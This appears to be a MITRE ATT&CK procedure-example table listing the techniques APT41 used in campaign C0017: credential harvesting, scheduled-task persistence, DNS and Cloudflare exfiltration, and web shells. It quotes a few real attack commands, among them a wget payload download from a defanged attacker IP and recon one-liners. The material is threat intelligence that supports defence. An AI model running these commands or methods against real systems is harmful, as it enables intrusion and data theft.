Real-world descriptions of how a group, tool or campaign used a technique.
29 examples
| Technique | Used by | Procedure example |
|---|---|---|
| T1001.003 Protocol or Service Impersonation |
CampaignC0017 | During C0017, APT41 frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server. |
| T1003.002 Security Account Manager |
CampaignC0017 | During C0017, APT41 copied the `SAM` and `SYSTEM` Registry hives for credential harvesting. |
| T1005 Data from Local System |
CampaignC0017 | During C0017, APT41 collected information related to compromised machines as well as Personal Identifiable Information (PII) from victim networks. |
| T1016 System Network Configuration Discovery |
CampaignC0017 | During C0017, APT41 used `cmd.exe /c ping %userdomain%` for discovery. |
| T1027 Obfuscated Files or Information |
CampaignC0017 | During C0017, APT41 broke malicious binaries, including DEADEYE and KEYPLUG, into multiple sections on disk to evade detection. |
| T1027.002 Software Packing |
CampaignC0017 | During C0017, APT41 used VMProtect to slow the reverse engineering of malicious binaries. |
| T1033 System Owner/User Discovery |
CampaignC0017 | During C0017, APT41 used `whoami` to gather information from victim machines. |
| T1036.004 Masquerade Task or Service |
CampaignC0017 | During C0017, APT41 used `SCHTASKS /Change` to modify legitimate scheduled tasks to run malicious code. |
| T1036.005 Match Legitimate Resource Name or Location |
CampaignC0017 | During C0017, APT41 used file names beginning with USERS, SYSUSER, and SYSLOG for DEADEYE, and changed KEYPLUG file extensions from .vmp to .upx likely to avoid hunting detections. |
| T1041 Exfiltration Over C2 Channel |
CampaignC0017 | During C0017, APT41 used its Cloudflare services C2 channels for data exfiltration. |
| T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol |
CampaignC0017 | During C0017, APT41 exfiltrated victim data via DNS lookups by encoding and prepending it as subdomains to the attacker-controlled domain. |
| T1053.005 Scheduled Task |
CampaignC0017 | During C0017, APT41 used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: `\Microsoft\Windows\PLA\Server Manager Performance Monitor`, `\Microsoft\Windows\Ras\ManagerMobility`, `\Microsoft\Windows\WDI\SrvSetupResults`, and `\Microsoft\Windows\WDI\USOShared`. |
| T1059.003 Windows Command Shell |
CampaignC0017 | During C0017, APT41 used `cmd.exe` to execute reconnaissance commands. |
| T1059.007 JavaScript |
CampaignC0017 | During C0017, APT41 deployed JScript web shells on compromised systems. |
| T1071.001 Web Protocols |
CampaignC0017 | During C0017, APT41 ran `wget http://103.224.80[.]44:8080/kernel` to download malicious payloads. |
| T1074.001 Local Data Staging |
CampaignC0017 | During C0017, APT41 copied the local `SAM` and `SYSTEM` Registry hives to a staging directory. |
| T1090 Proxy |
CampaignC0017 | During C0017, APT41 used the Cloudflare CDN to proxy C2 traffic. |
| T1102 Web Service |
CampaignC0017 | During C0017, APT41 used the Cloudflare services for C2 communications. |
| T1102.001 Dead Drop Resolver |
CampaignC0017 | During C0017, APT41 used dead drop resolvers on two separate tech community forums for their KEYPLUG Windows-version backdoor; notably APT41 updated the community forum posts frequently with new dead drop resolvers during the campaign. |
| T1105 Ingress Tool Transfer |
CampaignC0017 | During C0017, APT41 downloaded malicious payloads onto compromised systems. |
| T1134 Access Token Manipulation |
CampaignC0017 | During C0017, APT41 used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local `NT AUTHORITY\SYSTEM` privilege escalation. |
| T1140 Deobfuscate/Decode Files or Information |
CampaignC0017 | During C0017, APT41 used the DUSTPAN loader to decrypt embedded payloads. |
| T1190 Exploit Public-Facing Application |
CampaignC0017 | During C0017, APT41 exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities to gain initial access. |
| T1505.003 Web Shell |
CampaignC0017 | During C0017, APT41 deployed JScript web shells through the creation of malicious ViewState objects. |
| T1560.003 Archive via Custom Method |
CampaignC0017 | During C0017, APT41 hex-encoded PII data prior to exfiltration. |
| T1567 Exfiltration Over Web Service |
CampaignC0017 | During C0017, APT41 used Cloudflare services for data exfiltration. |
| T1574 Hijack Execution Flow |
CampaignC0017 | During C0017, APT41 established persistence by loading malicious libraries via modifications to the Import Address Table (IAT) within legitimate Microsoft binaries. |
| T1588.002 Tool |
CampaignC0017 | For C0017, APT41 obtained publicly available tools such as YSoSerial.NET, ConfuserEx, and BadPotato. |
| T1680 Local Storage Discovery |
CampaignC0017 | During C0017, APT41 issued `ping -n 1 ((cmd /c dir c:\|findstr Number).split()[-1]+` commands to find the volume serial number of compromised systems. |
Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.